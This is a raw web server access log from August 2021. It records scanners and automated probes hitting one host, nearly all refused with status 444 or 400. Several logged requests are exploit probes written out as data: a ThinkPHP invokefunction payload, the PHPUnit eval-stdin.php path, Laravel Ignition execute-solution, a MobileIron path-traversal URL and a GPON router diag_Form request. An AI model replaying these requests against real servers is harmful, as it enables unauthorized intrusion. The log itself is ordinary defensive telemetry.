"/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Aug/2021:17:05:23 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.220.250] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Aug/2021:17:15:40 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.212.227] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Aug/2021:18:22:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [13/Aug/2021:18:36:25 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.214.54] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Aug/2021:19:27:22 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 52.27.214.178] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [13/Aug/2021:19:32:45 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:19:32:46 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:19:51:05 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 252] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.3; zh-tw; HTC Pyramid Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" [13/Aug/2021:19:51:05 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11" "-" [13/Aug/2021:19:51:05 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [13/Aug/2021:20:55:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.41] [Length 0] [Gzip -] "-" "-" [13/Aug/2021:20:55:49 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.41] [Length 252] [Gzip -] "-" "-" [13/Aug/2021:20:55:49 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.41] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [13/Aug/2021:21:55:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [13/Aug/2021:22:33:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.220.200] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Aug/2021:23:04:59 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.216.251] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Aug/2021:23:34:39 +0000] 444 - HEAD https 64.22.31.253 "/" [Client 211.95.50.5] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [13/Aug/2021:23:34:40 +0000] 444 - HEAD https 253.31.22.64.aeneasdsl.com "/" [Client 211.95.50.4] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [14/Aug/2021:01:11:06 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:01:11:07 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:01:11:10 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:01:11:11 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:01:11:12 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:01:11:13 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [14/Aug/2021:01:11:13 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:01:11:15 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:01:11:15 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:01:11:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:01:11:19 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:02:19:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [14/Aug/2021:04:12:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [14/Aug/2021:05:22:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.2] [Length 0] [Gzip -] "-" "-" [14/Aug/2021:05:25:53 +0000] 400 - - http localhost "-" [Client 141.98.9.21] [Length 154] [Gzip -] "-" "-" [14/Aug/2021:05:52:14 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [14/Aug/2021:06:28:58 +0000] 400 - - http localhost "-" [Client 141.98.9.21] [Length 154] [Gzip -] "-" "-" [14/Aug/2021:07:21:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [14/Aug/2021:10:00:07 +0000] 444 - GET https io.moralanimal.net "/" [Client 198.204.234.253] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [14/Aug/2021:10:14:25 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.215.169] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Aug/2021:10:33:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [14/Aug/2021:10:40:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [14/Aug/2021:10:40:53 +0000] 400 - GET http 64.22.31.253 "/" [Client 185.180.143.74] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [14/Aug/2021:13:15:14 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 199.19.224.165] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [14/Aug/2021:14:51:07 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:14:51:08 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:14:51:08 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:14:51:09 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:14:51:10 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [14/Aug/2021:14:51:11 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:14:51:11 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:14:51:13 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:14:51:14 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:14:51:14 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:14:51:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Aug/2021:15:51:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.9.119.217] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Aug/2021:16:53:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.216.95] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Aug/2021:17:01:05 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Aug/2021:17:01:05 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Aug/2021:17:01:05 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Aug/2021:17:01:05 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Aug/2021:17:01:05 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Aug/2021:17:01:05 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Aug/2021:17:06:30 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.217.128] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Aug/2021:17:15:38 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.215.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Aug/2021:17:59:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [14/Aug/2021:18:37:36 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.215.244] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Aug/2021:18:43:05 +0000] 400 - GET https localhost "/" [Client 161.35.86.181] [Length 154] [Gzip -] "-" "-" [14/Aug/2021:18:43:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 161.35.86.181] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [14/Aug/2021:21:29:15 +0000] 444 - GET https localhost "/favicon.ico" [Client 109.248.6.13] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [14/Aug/2021:22:08:36 +0000] 444 - GET https 64.22.31.253 "/web/index.html" [Client 92.118.160.5] [Length 0] [Gzip -] "Go http package" "-" [14/Aug/2021:23:06:57 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.221.7] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Aug/2021:23:15:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.195.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Aug/2021:00:50:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Aug/2021:01:09:41 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 157.245.78.35] [Length 0] [Gzip -] "curl/7.3.2" "-" [15/Aug/2021:01:14:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Aug/2021:02:47:21 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 185.220.100.244] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36" "-" [15/Aug/2021:04:30:42 +0000] 400 - GET http 64.22.31.253 "/" [Client 45.83.66.205] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [15/Aug/2021:05:01:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.182] [Length 0] [Gzip -] "-" "-" [15/Aug/2021:07:10:34 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Aug/2021:07:10:34 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Aug/2021:07:10:36 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Aug/2021:07:10:37 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [15/Aug/2021:07:10:39 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Aug/2021:07:10:41 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Aug/2021:07:10:42 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Aug/2021:07:10:43 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Aug/2021:07:10:43 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Aug/2021:07:10:43 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Aug/2021:07:10:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Aug/2021:10:07:19 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 199.19.224.165] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [15/Aug/2021:10:15:42 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.214.121] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Aug/2021:11:28:57 +0000] 400 - - http localhost "-" [Client 61.219.11.153] [Length 154] [Gzip -] "-" "-" [15/Aug/2021:13:11:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Aug/2021:16:27:13 +0000] 444 - GET https localhost "/" [Client 50.31.21.7] [Length 0] [Gzip -] "-" "-" [15/Aug/2021:16:27:13 +0000] 444 - OPTIONS https localhost "/" [Client 50.31.21.7] [Length 0] [Gzip -] "-" "-" [15/Aug/2021:16:27:14 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 50.31.21.7] [Length 0] [Gzip -] "-" "-" [15/Aug/2021:16:27:14 +0000] 400 - - https localhost "-" [Client 50.31.21.7] [Length 154] [Gzip -] "-" "-" [15/Aug/2021:16:27:19 +0000] 400 - - https localhost "-" [Client 50.31.21.7] [Length 0] [Gzip -] "-" "-" [15/Aug/2021:16:27:19 +0000] 400 - - https localhost "-" [Client 50.31.21.7] [Length 154] [Gzip -] "-" "-" [15/Aug/2021:16:27:19 +0000] 400 - - https localhost "-" [Client 50.31.21.7] [Length 154] [Gzip -] "-" "-" [15/Aug/2021:16:27:19 +0000] 400 - - https localhost "-" [Client 50.31.21.7] [Length 154] [Gzip -] "-" "-" [15/Aug/2021:16:27:19 +0000] 400 - - https localhost "-" [Client 50.31.21.7] [Length 154] [Gzip -] "-" "-" [15/Aug/2021:16:27:19 +0000] 400 - - https localhost "-" [Client 50.31.21.7] [Length 154] [Gzip -] "-" "-" [15/Aug/2021:16:27:19 +0000] 400 - - https localhost "-" [Client 50.31.21.7] [Length 154] [Gzip -] "-" "-" [15/Aug/2021:16:28:38 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 50.31.21.7] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; G3313) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36" "-" [15/Aug/2021:16:28:38 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 50.31.21.7] [Length 654] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; G3313) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36" "-" [15/Aug/2021:16:28:40 +0000] 444 - GET https 64.22.31.253 "/nmaplowercheck1629044948" [Client 50.31.21.7] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; G3313) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36" "-" [15/Aug/2021:16:28:40 +0000] 444 - HEAD https 64.22.31.253 "/" [Client 50.31.21.7] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; G3313) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36" "-" [15/Aug/2021:16:28:40 +0000] 444 - GET https localhost "/" [Client 50.31.21.7] [Length 0] [Gzip -] "-" "-" [15/Aug/2021:16:28:40 +0000] 400 - GET http 64.22.31.253 "/nmaplowercheck1629044948" [Client 50.31.21.7] [Length 654] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; G3313) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36" "-" [15/Aug/2021:16:28:40 +0000] 400 - HEAD http 64.22.31.253 "/" [Client 50.31.21.7] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; G3313) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36" "-" [15/Aug/2021:16:28:40 +0000] 400 - GET http localhost "/" [Client 50.31.21.7] [Length 252] [Gzip -] "-" "-" [15/Aug/2021:16:28:40 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 50.31.21.7] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; G3313) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36" "-" [15/Aug/2021:16:28:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 50.31.21.7] [Length 0] [Gzip -] "-" "-" [15/Aug/2021:16:28:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 50.31.21.7] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; G3313) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36" "-" [15/Aug/2021:16:28:41 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 50.31.21.7] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; G3313) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36" "-" [15/Aug/2021:16:28:41 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 50.31.21.7] [Length 654] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; G3313) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36" "-" [15/Aug/2021:16:28:41 +0000] 400 - GET http 64.22.31.253 "/" [Client 50.31.21.7] [Length 654] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; G3313) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36" "-" [15/Aug/2021:16:28:41 +0000] 400 - GET http 64.22.31.253 "/" [Client 50.31.21.7] [Length 252] [Gzip -] "-" "-" [15/Aug/2021:16:28:41 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 50.31.21.7] [Length 654] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; G3313) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36" "-" [15/Aug/2021:16:54:43 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.220.203] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Aug/2021:17:01:08 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 